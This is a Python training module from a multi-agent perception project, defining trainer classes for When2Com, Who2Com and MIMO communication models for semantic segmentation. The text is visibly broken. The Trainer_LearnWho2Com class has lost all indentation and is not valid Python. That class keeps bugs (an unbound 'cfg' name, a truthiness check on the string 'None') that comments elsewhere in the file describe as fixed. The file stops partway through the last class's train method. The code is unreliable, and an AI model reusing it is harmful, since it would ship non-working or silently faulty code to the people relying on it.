2020-06-16T00:19:19.000Z
|
2022-03-18T19:37:48.000Z
|
ptsemseg/trainer.py
|
hyzcn/MultiAgentPerception
|
f73b8131cd4314c42f09d3502bd63d434a4ec219
|
[
"MIT"
] | 2
|
2021-11-08T01:46:18.000Z
|
2021-11-18T06:45:06.000Z
|
ptsemseg/trainer.py
|
hyzcn/MultiAgentPerception
|
f73b8131cd4314c42f09d3502bd63d434a4ec219
|
[
"MIT"
] | 8
|
2020-07-09T03:08:45.000Z
|
2022-03-24T16:07:29.000Z
|
import os
import yaml
import time
import shutil
import torch
import random
import argparse
import numpy as np
import copy
import timeit
import statistics
import datetime
from torch.utils import data
from tqdm import tqdm
import cv2
from ptsemseg.process_img import generate_noise
from ptsemseg.models import get_model
from ptsemseg.loss import get_loss_function
from ptsemseg.loader import get_loader
from ptsemseg.utils import get_logger, init_weights
from ptsemseg.metrics import runningScore, averageMeter
from ptsemseg.augmentations import get_composed_augmentations
from ptsemseg.schedulers import get_scheduler
from ptsemseg.optimizers import get_optimizer
from ptsemseg.utils import convert_state_dict
from tensorboardX import SummaryWriter
class Trainer_LearnWhen2Com(object):
    """Train/validate/evaluate driver for the When2Com segmentation model.

    All collaborators (model, dataloaders, optimizer, scheduler, loss
    function, tensorboardX writer, logger) are built by the caller and
    injected; this class only orchestrates the loop, checkpointing and
    metric reporting.
    """

    def __init__(self, cfg, writer, logger, model, loss_fn, trainloader, valloader, optimizer, scheduler, device):
        self.cfg = cfg
        self.writer = writer
        self.logger = logger
        self.model = model
        self.trainloader = trainloader
        self.valloader = valloader
        self.optimizer = optimizer
        self.scheduler = scheduler
        self.loss_fn = loss_fn
        self.n_classes = 11  # fixed number of segmentation classes
        self.MO_flag = self.cfg['model']['multiple_output']
        self.running_metrics_val = runningScore(self.n_classes)
        self.device = device
        # Some datasets carry no communication labels.  NOTE: the sentinel
        # is the *string* 'None' (not the None object) throughout.
        if 'commun_label' in self.cfg["data"]:
            self.if_commun_label = cfg["data"]['commun_label']
        else:
            self.if_commun_label = 'None'

    def train(self):
        """Run the training loop with periodic validation.

        Returns the path of the best checkpoint saved (highest mean IoU),
        or None if training finished without saving one.
        """
        start_iter = 0
        # resume the training
        if self.cfg["training"]["resume"] is not None:
            if os.path.isfile(self.cfg["training"]["resume"]):
                # BUG FIX: was `cfg[...]` (unbound name) instead of
                # `self.cfg[...]`, raising NameError on resume.
                self.logger.info(
                    "Loading model and optimizer from checkpoint '{}'".format(
                        self.cfg["training"]["resume"])
                )
                checkpoint = torch.load(self.cfg["training"]["resume"])
                self.model.load_state_dict(checkpoint["model_state"])
                self.optimizer.load_state_dict(checkpoint["optimizer_state"])
                self.scheduler.load_state_dict(checkpoint["scheduler_state"])
                start_iter = checkpoint["epoch"]
                self.logger.info(
                    "Loaded checkpoint '{}' (iter {})".format(
                        self.cfg["training"]["resume"], checkpoint["epoch"]
                    )
                )
            else:
                self.logger.info("No checkpoint found at '{}'".format(
                    self.cfg["training"]["resume"]))

        val_loss_meter = averageMeter()
        time_meter = averageMeter()
        best_iou = -100.0
        # Guard against returning an unbound name if no validation pass
        # ever saves a checkpoint.
        save_path = None
        i = start_iter
        flag = True
        # Training
        while i <= self.cfg["training"]["train_iters"] and flag:
            for data_list in self.trainloader:
                # iteration timer
                i += 1
                # load data from dataloader
                if self.if_commun_label != 'None':
                    images_list, labels_list, commun_label = data_list
                else:
                    images_list, labels_list = data_list
                # image and labels list 2 tensor
                labels = labels_list[0]
                images = torch.cat(tuple(images_list), dim=1)
                # timer started
                start_ts = time.time()
                self.scheduler.step()
                self.model.train()  # matters for batchnorm/dropout
                # from cpu to gpu
                images = images.to(self.device)
                labels = labels.to(self.device)
                if self.if_commun_label != 'None':
                    commun_label = commun_label.to(self.device)
                # clean the optimizer
                self.optimizer.zero_grad()
                # model inference
                outputs, log_action, action_argmax = self.model(
                    images, training=True)
                # compute loss
                loss = self.loss_fn(input=outputs, target=labels)
                # compute the gradient for each variable
                loss.backward()
                # update the weight
                self.optimizer.step()
                # compute the used time
                time_meter.update(time.time() - start_ts)
                # Process display on screen
                if (i + 1) % self.cfg["training"]["print_interval"] == 0:
                    fmt_str = "Iter [{:d}/{:d}] Loss: {:.4f} Time/Image: {:.4f}"
                    print_str = fmt_str.format(
                        i + 1,
                        self.cfg["training"]["train_iters"],
                        loss.item(),
                        time_meter.avg / self.cfg["training"]["batch_size"],
                    )
                    print(print_str)
                    self.logger.info(print_str)
                    self.writer.add_scalar("loss/train_loss", loss.item(), i + 1)
                    time_meter.reset()
                # Validation (During training)
                if (i % self.cfg["training"]["val_interval"] == 0 or
                        i == self.cfg["training"]["train_iters"]):
                    self.model.eval()
                    with torch.no_grad():
                        for i_val, data_list in tqdm(enumerate(self.valloader)):
                            if self.if_commun_label != 'None':
                                images_val_list, labels_val_list, commun_label = data_list
                            else:
                                images_val_list, labels_val_list = data_list
                            labels_val = labels_val_list[0]
                            images_val = torch.cat(tuple(images_val_list), dim=1)
                            labels_val = labels_val.to(self.device)
                            if self.if_commun_label != 'None':
                                commun_label = commun_label.to(self.device)
                            images_val = images_val.to(self.device)
                            gt = labels_val.data.cpu().numpy()
                            # image loss
                            outputs, _, action_argmax = self.model(
                                images_val, training=True)
                            val_loss = self.loss_fn(input=outputs,
                                                    target=labels_val)
                            pred = outputs.data.max(1)[1].cpu().numpy()
                            action_argmax = torch.squeeze(action_argmax)
                            # compute action accuracy
                            if self.if_commun_label != 'None':
                                self.running_metrics_val.update_div(
                                    self.if_commun_label, gt, pred,
                                    commun_label)
                                self.running_metrics_val.update_selection(
                                    self.if_commun_label, commun_label,
                                    action_argmax)
                            self.running_metrics_val.update(gt, pred)
                            val_loss_meter.update(val_loss.item())
                    if self.if_commun_label != 'None':
                        when2com_acc, who2com_acc = \
                            self.running_metrics_val.get_selection_accuracy()
                        print('Validation when2com accuracy:{}'.format(
                            when2com_acc))
                        print('Validation who2com accuracy:{}'.format(
                            who2com_acc))
                        self.writer.add_scalar(
                            "val_metrics/when_com_accuacy", when2com_acc, i)
                        self.writer.add_scalar(
                            "val_metrics/who_com_accuracy", who2com_acc, i)
                    else:
                        when2com_acc = 0
                        who2com_acc = 0
                    self.writer.add_scalar("loss/val_loss",
                                           val_loss_meter.avg, i)
                    self.logger.info("Iter %d Loss: %.4f" %
                                     (i, val_loss_meter.avg))
                    scorers = [self.running_metrics_val]
                    for idx, scorer in enumerate(scorers):
                        score, class_iou = scorer.get_scores()
                        for k, v in score.items():
                            self.logger.info("{}: {}".format(k, v))
                            self.writer.add_scalar(
                                "head_{}_val_metrics/{}".format(idx, k), v, i)
                        for k, v in class_iou.items():
                            self.logger.info("{}: {}".format(k, v))
                            self.writer.add_scalar(
                                "head_{}_val_metrics/cls_{}".format(idx, k),
                                v, i)
                    # print per-condition and overall scores
                    print('Normal')
                    score, class_iou = \
                        self.running_metrics_val.get_only_normal_scores()
                    self.running_metrics_val.print_score(
                        self.n_classes, score, class_iou)
                    print('Noise')
                    score, class_iou = \
                        self.running_metrics_val.get_only_noise_scores()
                    self.running_metrics_val.print_score(
                        self.n_classes, score, class_iou)
                    print("Overall")
                    score, class_iou = self.running_metrics_val.get_scores()
                    self.running_metrics_val.print_score(
                        self.n_classes, score, class_iou)
                    val_loss_meter.reset()
                    self.running_metrics_val.reset()
                    # Checkpoint on best overall mean IoU.
                    if score["Mean IoU : \t"] >= best_iou:
                        best_iou = score["Mean IoU : \t"]
                        state = {
                            "epoch": i,
                            "model_state": self.model.state_dict(),
                            "optimizer_state": self.optimizer.state_dict(),
                            "scheduler_state": self.scheduler.state_dict(),
                            "best_iou": best_iou,
                        }
                        save_path = os.path.join(
                            self.writer.file_writer.get_logdir(),
                            "{}_{}_best_model.pkl".format(
                                self.cfg["model"]["arch"],
                                self.cfg["data"]["dataset"]),
                        )
                        torch.save(state, save_path)
                if i == self.cfg["training"]["train_iters"]:
                    flag = False
                    break
        return save_path

    def load_weight(self, model_path):
        """Load model weights from a checkpoint file (non-strict)."""
        state = convert_state_dict(torch.load(model_path)["model_state"])
        self.model.load_state_dict(state, strict=False)

    def evaluate(self, testloader, inference_mode='activated'):
        """Evaluate on *testloader* and print normal/noise/overall scores.

        Returns the overall (score, class_iou) pair.
        """
        running_metrics = runningScore(self.n_classes)
        # Setup Model
        self.model.eval()
        self.model.to(self.device)
        for i, data_list in enumerate(testloader):
            # BUG FIX: the sentinel for "no communication label" is the
            # string 'None', which is truthy; the original bare truthiness
            # check always took the 3-tuple branch and crashed on datasets
            # without communication labels.  Compare against the sentinel,
            # matching train().
            if self.if_commun_label != 'None':
                images_list, labels_list, commun_label = data_list
                commun_label = commun_label.to(self.device)
            else:
                images_list, labels_list = data_list
            # multi-view inputs
            images = torch.cat(tuple(images_list), dim=1)
            # multiple output
            if self.MO_flag:
                labels = torch.cat(tuple(labels_list), dim=0)
            else:  # single output
                labels = labels_list[0]
            images = images.to(self.device)
            outputs, _, action_argmax, _ = self.model(
                images, training=False, inference=inference_mode)
            pred = outputs.data.max(1)[1].cpu().numpy()
            gt = labels.numpy()
            # measurement results
            running_metrics.update(gt, pred)
            if self.if_commun_label != 'None':
                running_metrics.update_div(self.if_commun_label, gt, pred,
                                           commun_label)
        print('Normal')
        score, class_iou = running_metrics.get_only_normal_scores()
        running_metrics.print_score(self.n_classes, score, class_iou)
        print('Noise')
        score, class_iou = running_metrics.get_only_noise_scores()
        running_metrics.print_score(self.n_classes, score, class_iou)
        print("Overall")
        score, class_iou = running_metrics.get_scores()
        running_metrics.print_score(self.n_classes, score, class_iou)
        return score, class_iou
class Trainer_LearnWho2Com(object):
def __init__(self, cfg, writer, logger, model, loss_fn, trainloader, valloader, optimizer, scheduler, device):
    """Store injected collaborators and set up validation metrics."""
    self.cfg = cfg
    self.writer = writer
    self.logger = logger
    self.device = device
    self.model = model
    self.loss_fn = loss_fn
    self.optimizer = optimizer
    self.scheduler = scheduler
    self.trainloader = trainloader
    self.valloader = valloader
    self.MO_flag = cfg['model']['multiple_output']
    self.n_classes = 11
    self.running_metrics_val = runningScore(self.n_classes)
    # some datasets have no labels for communication; the sentinel is the
    # string 'None'
    self.if_commun_label = cfg["data"].get('commun_label', 'None')
def train(self):
start_iter = 0
print('learnwho2com trainer')
# resume the training
if self.cfg["training"]["resume"] is not None:
if os.path.isfile(self.cfg["training"]["resume"]):
self.logger.info(
"Loading model and optimizer from checkpoint '{}'".format(cfg["training"]["resume"])
)
checkpoint = torch.load(self.cfg["training"]["resume"])
self.model.load_state_dict(checkpoint["model_state"])
self.optimizer.load_state_dict(checkpoint["optimizer_state"])
self.scheduler.load_state_dict(checkpoint["scheduler_state"])
start_iter = checkpoint["epoch"]
self.logger.info(
"Loaded checkpoint '{}' (iter {})".format(
self.cfg["training"]["resume"], checkpoint["epoch"]
)
)
else:
self.logger.info("No checkpoint found at '{}'".format(self.cfg["training"]["resume"]))
val_loss_meter = averageMeter()
time_meter = averageMeter()
best_iou = -100.0
i = start_iter
flag = True
# Training
while i <= self.cfg["training"]["train_iters"] and flag:
for data_list in self.trainloader:
# iteration timer
i += 1
# load data from dataloader
if self.if_commun_label != 'None':
images_list, labels_list, commun_label = data_list
else:
images_list, labels_list = data_list
# image and labels list 2 tensor
labels = labels_list[0]
images = torch.cat(tuple(images_list), dim=1)
# timer started
start_ts = time.time()
self.scheduler.step()
self.model.train() # matters for batchnorm/dropout
# from cpu to gpu
images = images.to(self.device)
labels = labels.to(self.device)
if self.if_commun_label != 'None':
commun_label = commun_label.to(self.device)
# clean the optimizer
self.optimizer.zero_grad()
# model inference
outputs, log_action, action_argmax = self.model(images, training=True)
# compute loss
loss = self.loss_fn(input=outputs, target=labels)
# compute the gradient for each variable
loss.backward()
# update the weight
self.optimizer.step()
# compute the used time
time_meter.update(time.time() - start_ts)
# Process display on screen
if (i + 1) % self.cfg["training"]["print_interval"] == 0:
fmt_str = "Iter [{:d}/{:d}] Loss: {:.4f} Time/Image: {:.4f}"
print_str = fmt_str.format(
i + 1,
self.cfg["training"]["train_iters"],
loss.item(),
time_meter.avg / self.cfg["training"]["batch_size"],
)
print(print_str)
self.logger.info(print_str)
self.writer.add_scalar("loss/train_loss", loss.item(), i + 1)
time_meter.reset()
# Validation (During training)
if i % self.cfg["training"]["val_interval"] == 0 or i == self.cfg["training"]["train_iters"]:
self.model.eval()
with torch.no_grad():
total = 0
correct_when = 0
correct_who = 0
for i_val, data_list in tqdm(enumerate(self.valloader)):
if self.if_commun_label != 'None':
images_val_list, labels_val_list, commun_label = data_list
else:
images_val_list, labels_val_list = data_list
labels_val = labels_val_list[0]
images_val = torch.cat(tuple(images_val_list), dim=1)
labels_val = labels_val.to(self.device)
if self.if_commun_label != 'None':
commun_label = commun_label.to(self.device)
images_val = images_val.to(self.device)
gt = labels_val.data.cpu().numpy()
# image loss
outputs, _, action_argmax = self.model(images_val, training=True)
val_loss = self.loss_fn(input=outputs, target=labels_val)
pred = outputs.data.max(1)[1].cpu().numpy()
action_argmax = torch.squeeze(action_argmax)
# compute action accuracy
if self.if_commun_label != 'None':
self.running_metrics_val.update_div(self.if_commun_label, gt, pred, commun_label)
self.running_metrics_val.update_selection(self.if_commun_label, commun_label, action_argmax + 1)
# plus one since target is not included in "alwaysCom" model
self.running_metrics_val.update(gt, pred)
val_loss_meter.update(val_loss.item())
if self.if_commun_label != 'None':
when2com_acc, who2com_acc = self.running_metrics_val.get_selection_accuracy()
print('Validation when2com accuracy:{}'.format(when2com_acc))
print('Validation who2com accuracy:{}'.format(who2com_acc))
self.writer.add_scalar("val_metrics/when_com_accuacy", when2com_acc, i)
self.writer.add_scalar("val_metrics/who_com_accuracy", who2com_acc, i)
else:
when2com_acc = 0
who2com_acc = 0
# for tensorboard
self.writer.add_scalar("loss/val_loss", val_loss_meter.avg, i)
self.logger.info("Iter %d Loss: %.4f" % (i, val_loss_meter.avg))
scorers = [self.running_metrics_val]
for idx, scorer in enumerate(scorers):
score, class_iou = scorer.get_scores()
for k, v in score.items():
self.logger.info("{}: {}".format(k, v))
self.writer.add_scalar("head_{}_val_metrics/{}".format(idx, k), v, i)
for k, v in class_iou.items():
self.logger.info("{}: {}".format(k, v))
self.writer.add_scalar("head_{}_val_metrics/cls_{}".format(idx, k), v, i)
# print
print('Normal')
score, class_iou = self.running_metrics_val.get_only_normal_scores()
self.running_metrics_val.print_score(self.n_classes, score, class_iou)
print('Noise')
score, class_iou = self.running_metrics_val.get_only_noise_scores()
self.running_metrics_val.print_score(self.n_classes, score, class_iou)
print("Overall")
score, class_iou = self.running_metrics_val.get_scores()
self.running_metrics_val.print_score(self.n_classes, score, class_iou)
val_loss_meter.reset()
self.running_metrics_val.reset()
if score["Mean IoU : \t"] >= best_iou:
best_iou = score["Mean IoU : \t"]
state = {
"epoch": i,
"model_state": self.model.state_dict(),
"optimizer_state": self.optimizer.state_dict(),
"scheduler_state": self.scheduler.state_dict(),
"best_iou": best_iou,
}
save_path = os.path.join(
self.writer.file_writer.get_logdir(),
"{}_{}_best_model.pkl".format(self.cfg["model"]["arch"], self.cfg["data"]["dataset"]),
)
torch.save(state, save_path)
if i == self.cfg["training"]["train_iters"]:
flag = False
break
return save_path
def load_weight(self, model_path):
state = convert_state_dict(torch.load(model_path)["model_state"])
self.model.load_state_dict(state, strict=False)
def evaluate(self, testloader, inference_mode='argmax_test'): # "val_split"
running_metrics = runningScore(self.n_classes)
# Setup Model
self.model.eval()
self.model.to(self.device)
for i, data_list in enumerate(testloader):
if self.if_commun_label:
images_list, labels_list, commun_label = data_list
commun_label = commun_label.to(self.device)
else:
images_list, labels_list = data_list
# multi-view inputs
images = torch.cat(tuple(images_list), dim=1)
# multi-view output
if self.MO_flag:
labels = torch.cat(tuple(labels_list), dim=0)
else: # single output
labels = labels_list[0]
images = images.to(self.device)
# MODEL INFERENCE
outputs, action, action_argmax = self.model(images, training=False, inference=inference_mode)
pred = outputs.data.max(1)[1].cpu().numpy()
gt = labels.numpy()
# measurement results
running_metrics.update(gt, pred)
if self.if_commun_label:
running_metrics.update_div(self.if_commun_label, gt, pred, commun_label)
running_metrics.update_selection(self.if_commun_label, commun_label, action_argmax+1)
if self.if_commun_label:
when2com_acc, who2com_acc = running_metrics.get_selection_accuracy()
print('Validation when2com accuracy:{}'.format(when2com_acc))
print('Validation who2com accuracy:{}'.format(who2com_acc))
else:
when2com_acc = 0
who2com_acc = 0
print('Normal')
score, class_iou = running_metrics.get_only_normal_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
print('Noise')
score, class_iou = running_metrics.get_only_noise_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
print("Overall")
score, class_iou = running_metrics.get_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
return score, class_iou
class Trainer_MIMOcom(object):
    """Training/evaluation driver for the MIMO communication model.

    Runs the optimisation loop with periodic validation, logs to TensorBoard
    and the project logger, checkpoints the best-mean-IoU model, and offers a
    standalone evaluation that also reports bandwidth usage. The wrapped
    model's forward returns ``(outputs, log_action, action_argmax, bandW)``.
    """

    def __init__(self, cfg, writer, logger, model, loss_fn, trainloader, valloader, optimizer, scheduler, device):
        self.cfg = cfg
        self.writer = writer
        self.logger = logger
        self.model = model
        self.trainloader = trainloader
        self.valloader = valloader
        self.optimizer = optimizer
        self.scheduler = scheduler
        self.n_classes = 11  # number of segmentation classes (fixed for this dataset)
        self.loss_fn = loss_fn
        self.running_metrics_val = runningScore(self.n_classes)
        self.device = device
        self.MO_flag = self.cfg['model']['multiple_output']
        # Some datasets have no labels for communication; the sentinel is the
        # *string* 'None' and is tested with `!= 'None'` throughout.
        if 'commun_label' in self.cfg["data"]:
            self.if_commun_label = self.cfg["data"]['commun_label']
        else:
            self.if_commun_label = 'None'

    def train(self):
        """Train until ``cfg['training']['train_iters']`` iterations.

        Returns:
            Path of the checkpoint achieving the best validation mean IoU.
        """
        # load model
        print('LearnMIMOCom_Trainer')
        start_iter = 0
        if self.cfg["training"]["resume"] is not None:
            if os.path.isfile(self.cfg["training"]["resume"]):
                self.logger.info(
                    "Loading model and optimizer from checkpoint '{}'".format(self.cfg["training"]["resume"])
                )
                checkpoint = torch.load(self.cfg["training"]["resume"])
                self.model.load_state_dict(checkpoint["model_state"])
                self.optimizer.load_state_dict(checkpoint["optimizer_state"])
                self.scheduler.load_state_dict(checkpoint["scheduler_state"])
                start_iter = checkpoint["epoch"]
                self.logger.info(
                    "Loaded checkpoint '{}' (iter {})".format(
                        self.cfg["training"]["resume"], checkpoint["epoch"]
                    )
                )
            else:
                self.logger.info("No checkpoint found at '{}'".format(self.cfg["training"]["resume"]))
        val_loss_meter = averageMeter()
        time_meter = averageMeter()
        best_iou = -100.0
        i = start_iter
        flag = True
        # training
        while i <= self.cfg["training"]["train_iters"] and flag:
            for data_list in self.trainloader:
                i += 1
                start_ts = time.time()
                if self.if_commun_label != 'None':
                    images_list, labels_list, commun_label = data_list
                else:
                    images_list, labels_list = data_list
                images = torch.cat(tuple(images_list), dim=1)
                if self.MO_flag:  # multiple output
                    labels = torch.cat(tuple(labels_list), dim=0)
                else:  # single output
                    labels = labels_list[0]
                self.scheduler.step()
                self.model.train()  # matters for batchnorm/dropout
                images = images.to(self.device)
                labels = labels.to(self.device)
                if self.if_commun_label != 'None':
                    commun_label = commun_label.to(self.device)
                # image loss
                self.optimizer.zero_grad()
                outputs, log_action, action_argmax, _ = self.model(images, training=True, MO_flag=self.MO_flag)
                loss = self.loss_fn(input=outputs, target=labels)
                loss.backward()
                self.optimizer.step()
                time_meter.update(time.time() - start_ts)
                # Process display on screen
                if (i + 1) % self.cfg["training"]["print_interval"] == 0:
                    fmt_str = "Iter [{:d}/{:d}] Loss: {:.4f} Time/Image: {:.4f}"
                    print_str = fmt_str.format(
                        i + 1,
                        self.cfg["training"]["train_iters"],
                        loss.item(),
                        time_meter.avg / self.cfg["training"]["batch_size"],
                    )
                    print(print_str)
                    self.logger.info(print_str)
                    self.writer.add_scalar("loss/train_loss", loss.item(), i + 1)
                    time_meter.reset()
                ### Validation
                if i % self.cfg["training"]["val_interval"] == 0 or i == self.cfg["training"]["train_iters"]:
                    self.model.eval()
                    with torch.no_grad():
                        for i_val, data_list in tqdm(enumerate(self.valloader)):
                            if self.if_commun_label != 'None':
                                images_val_list, labels_val_list, commun_label = data_list
                                commun_label = commun_label.to(self.device)
                            else:
                                images_val_list, labels_val_list = data_list
                            images_val = torch.cat(tuple(images_val_list), dim=1)
                            if self.MO_flag:  # obtain multiple ground-truth
                                labels_val = torch.cat(tuple(labels_val_list), dim=0)
                            else:  # only select one view gt mask
                                labels_val = labels_val_list[0]
                            labels_val = labels_val.to(self.device)
                            images_val = images_val.to(self.device)
                            gt = labels_val.data.cpu().numpy()
                            # image loss
                            # NOTE(review): validation calls the model with
                            # training=True (kept from the original code) --
                            # confirm this is the intended inference path.
                            outputs, _, action_argmax, _ = self.model(images_val, training=True, MO_flag=self.MO_flag)
                            val_loss = self.loss_fn(input=outputs, target=labels_val)
                            pred = outputs.data.max(1)[1].cpu().numpy()
                            # compute action accuracy
                            if self.if_commun_label != 'None':
                                self.running_metrics_val.update_div(self.if_commun_label, gt, pred, commun_label)
                                self.running_metrics_val.update_selection(self.if_commun_label, commun_label, action_argmax)
                            self.running_metrics_val.update(gt, pred)
                            val_loss_meter.update(val_loss.item())
                        if self.if_commun_label != 'None':
                            when2com_acc, who2com_acc = self.running_metrics_val.get_selection_accuracy()
                            print('Validation when2com accuracy:{}'.format(when2com_acc))
                            print('Validation who2com accuracy:{}'.format(who2com_acc))
                            self.writer.add_scalar("val_metrics/when_com_accuacy", when2com_acc, i)
                            self.writer.add_scalar("val_metrics/who_com_accuracy", who2com_acc, i)
                        self.writer.add_scalar("loss/val_loss", val_loss_meter.avg, i)
                        self.logger.info("Iter %d Loss: %.4f" % (i, val_loss_meter.avg))
                        print('Normal')
                        score, class_iou = self.running_metrics_val.get_only_normal_scores()
                        self.running_metrics_val.print_score(self.n_classes, score, class_iou)
                        print('Noise')
                        score, class_iou = self.running_metrics_val.get_only_noise_scores()
                        self.running_metrics_val.print_score(self.n_classes, score, class_iou)
                        print("Overall")
                        score, class_iou = self.running_metrics_val.get_scores()
                        self.running_metrics_val.print_score(self.n_classes, score, class_iou)
                        val_loss_meter.reset()
                        self.running_metrics_val.reset()
                        # store the best model
                        if score["Mean IoU : \t"] >= best_iou:
                            best_iou = score["Mean IoU : \t"]
                            state = {
                                "epoch": i,
                                "model_state": self.model.state_dict(),
                                "optimizer_state": self.optimizer.state_dict(),
                                "scheduler_state": self.scheduler.state_dict(),
                                "best_iou": best_iou,
                            }
                            save_path = os.path.join(
                                self.writer.file_writer.get_logdir(),
                                "{}_{}_best_model.pkl".format(self.cfg["model"]["arch"], self.cfg["data"]["dataset"]),
                            )
                            torch.save(state, save_path)
                if i == self.cfg["training"]["train_iters"]:
                    flag = False
                    break
        return save_path

    def load_weight(self, model_path):
        """Load model weights (non-strict) from a saved checkpoint file."""
        state = convert_state_dict(torch.load(model_path)["model_state"])
        self.model.load_state_dict(state, strict=False)

    def evaluate(self, testloader, inference_mode='activated'): # "val_split"
        """Evaluate on ``testloader``; print bandwidth, selection accuracies
        and Normal/Noise/Overall scores.

        Returns:
            ``(score, class_iou)`` of the overall split.
        """
        running_metrics = runningScore(self.n_classes)
        # Setup Model
        self.model.eval()
        self.model.to(self.device)
        for i, data_list in enumerate(testloader):
            # Fix: use the 'None' sentinel comparison as train() does; the
            # sentinel string is truthy so a bare `if` took the wrong branch.
            if self.if_commun_label != 'None':
                images_list, labels_list, commun_label = data_list
                commun_label = commun_label.to(self.device)
            else:
                images_list, labels_list = data_list
            # multi-view inputs
            images = torch.cat(tuple(images_list), dim=1)
            # multiple output
            if self.MO_flag:
                labels = torch.cat(tuple(labels_list), dim=0)
            else:  # single output
                labels = labels_list[0]
            images = images.to(self.device)
            outputs, _, action_argmax, bandW = self.model(images, training=False, MO_flag=self.MO_flag, inference=inference_mode)
            pred = outputs.data.max(1)[1].cpu().numpy()
            gt = labels.numpy()
            # measurement results
            running_metrics.update(gt, pred)
            running_metrics.update_bandW(bandW)
            if self.if_commun_label != 'None':
                running_metrics.update_div(self.if_commun_label, gt, pred, commun_label)
                running_metrics.update_selection(self.if_commun_label, commun_label, action_argmax)
        if self.if_commun_label != 'None':
            when2com_acc, who2com_acc = running_metrics.get_selection_accuracy()
            print('Validation when2com accuracy:{}'.format(when2com_acc))
            print('Validation who2com accuracy:{}'.format(who2com_acc))
        avg_bandW = running_metrics.get_avg_bandW()
        print('Bandwidth: ' + str(avg_bandW))
        print('Normal')
        score, class_iou = running_metrics.get_only_normal_scores()
        running_metrics.print_score(self.n_classes, score, class_iou)
        print('Noise')
        score, class_iou = running_metrics.get_only_noise_scores()
        running_metrics.print_score(self.n_classes, score, class_iou)
        print("Overall")
        score, class_iou = running_metrics.get_scores()
        running_metrics.print_score(self.n_classes, score, class_iou)
        return score, class_iou
class Trainer_MIMOcomWho(object):
    """Training/evaluation driver for the MIMO who2com variant.

    Structurally parallel to ``Trainer_MIMOcom``: optimisation loop with
    periodic validation, TensorBoard/logger reporting, best-mean-IoU
    checkpointing, and a standalone evaluation that reports bandwidth.
    The wrapped model's forward returns
    ``(outputs, log_action, action_argmax, bandW)``.
    """

    def __init__(self, cfg, writer, logger, model, loss_fn, trainloader, valloader, optimizer, scheduler, device):
        self.cfg = cfg
        self.writer = writer
        self.logger = logger
        self.model = model
        self.trainloader = trainloader
        self.valloader = valloader
        self.optimizer = optimizer
        self.scheduler = scheduler
        self.n_classes = 11  # number of segmentation classes (fixed for this dataset)
        self.loss_fn = loss_fn
        self.running_metrics_val = runningScore(self.n_classes)
        self.device = device
        self.MO_flag = self.cfg['model']['multiple_output']
        # Some datasets have no labels for communication; the sentinel is the
        # *string* 'None' and is tested with `!= 'None'` throughout.
        if 'commun_label' in self.cfg["data"]:
            self.if_commun_label = self.cfg["data"]['commun_label']
        else:
            self.if_commun_label = 'None'

    def train(self):
        """Train until ``cfg['training']['train_iters']`` iterations.

        Returns:
            Path of the checkpoint achieving the best validation mean IoU.
        """
        # load model
        print('LearnMIMOComWho_Trainer')
        start_iter = 0
        if self.cfg["training"]["resume"] is not None:
            if os.path.isfile(self.cfg["training"]["resume"]):
                self.logger.info(
                    "Loading model and optimizer from checkpoint '{}'".format(self.cfg["training"]["resume"])
                )
                checkpoint = torch.load(self.cfg["training"]["resume"])
                self.model.load_state_dict(checkpoint["model_state"])
                self.optimizer.load_state_dict(checkpoint["optimizer_state"])
                self.scheduler.load_state_dict(checkpoint["scheduler_state"])
                start_iter = checkpoint["epoch"]
                self.logger.info(
                    "Loaded checkpoint '{}' (iter {})".format(
                        self.cfg["training"]["resume"], checkpoint["epoch"]
                    )
                )
            else:
                self.logger.info("No checkpoint found at '{}'".format(self.cfg["training"]["resume"]))
        val_loss_meter = averageMeter()
        time_meter = averageMeter()
        best_iou = -100.0
        i = start_iter
        flag = True
        # training
        while i <= self.cfg["training"]["train_iters"] and flag:
            for data_list in self.trainloader:
                i += 1
                start_ts = time.time()
                if self.if_commun_label != 'None':
                    images_list, labels_list, commun_label = data_list
                else:
                    images_list, labels_list = data_list
                images = torch.cat(tuple(images_list), dim=1)
                if self.MO_flag:  # multiple output
                    labels = torch.cat(tuple(labels_list), dim=0)
                else:  # single output
                    labels = labels_list[0]
                self.scheduler.step()
                self.model.train()  # matters for batchnorm/dropout
                images = images.to(self.device)
                labels = labels.to(self.device)
                if self.if_commun_label != 'None':
                    commun_label = commun_label.to(self.device)
                # image loss
                self.optimizer.zero_grad()
                outputs, log_action, action_argmax, _ = self.model(images, training=True, MO_flag=self.MO_flag)
                loss = self.loss_fn(input=outputs, target=labels)
                loss.backward()
                self.optimizer.step()
                time_meter.update(time.time() - start_ts)
                # Process display on screen
                if (i + 1) % self.cfg["training"]["print_interval"] == 0:
                    fmt_str = "Iter [{:d}/{:d}] Loss: {:.4f} Time/Image: {:.4f}"
                    print_str = fmt_str.format(
                        i + 1,
                        self.cfg["training"]["train_iters"],
                        loss.item(),
                        time_meter.avg / self.cfg["training"]["batch_size"],
                    )
                    print(print_str)
                    self.logger.info(print_str)
                    self.writer.add_scalar("loss/train_loss", loss.item(), i + 1)
                    time_meter.reset()
                ### Validation
                if i % self.cfg["training"]["val_interval"] == 0 or i == self.cfg["training"]["train_iters"]:
                    self.model.eval()
                    with torch.no_grad():
                        for i_val, data_list in tqdm(enumerate(self.valloader)):
                            if self.if_commun_label != 'None':
                                images_val_list, labels_val_list, commun_label = data_list
                                commun_label = commun_label.to(self.device)
                            else:
                                images_val_list, labels_val_list = data_list
                            images_val = torch.cat(tuple(images_val_list), dim=1)
                            if self.MO_flag:  # obtain multiple ground-truth
                                labels_val = torch.cat(tuple(labels_val_list), dim=0)
                            else:  # only select one view gt mask
                                labels_val = labels_val_list[0]
                            labels_val = labels_val.to(self.device)
                            images_val = images_val.to(self.device)
                            gt = labels_val.data.cpu().numpy()
                            # image loss
                            # NOTE(review): validation calls the model with
                            # training=True (kept from the original code) --
                            # confirm this is the intended inference path.
                            outputs, _, action_argmax, _ = self.model(images_val, training=True, MO_flag=self.MO_flag)
                            val_loss = self.loss_fn(input=outputs, target=labels_val)
                            pred = outputs.data.max(1)[1].cpu().numpy()
                            # compute action accuracy
                            if self.if_commun_label != 'None':
                                self.running_metrics_val.update_div(self.if_commun_label, gt, pred, commun_label)
                                self.running_metrics_val.update_selection(self.if_commun_label, commun_label, action_argmax)
                            self.running_metrics_val.update(gt, pred)
                            val_loss_meter.update(val_loss.item())
                        if self.if_commun_label != 'None':
                            when2com_acc, who2com_acc = self.running_metrics_val.get_selection_accuracy()
                            print('Validation when2com accuracy:{}'.format(when2com_acc))
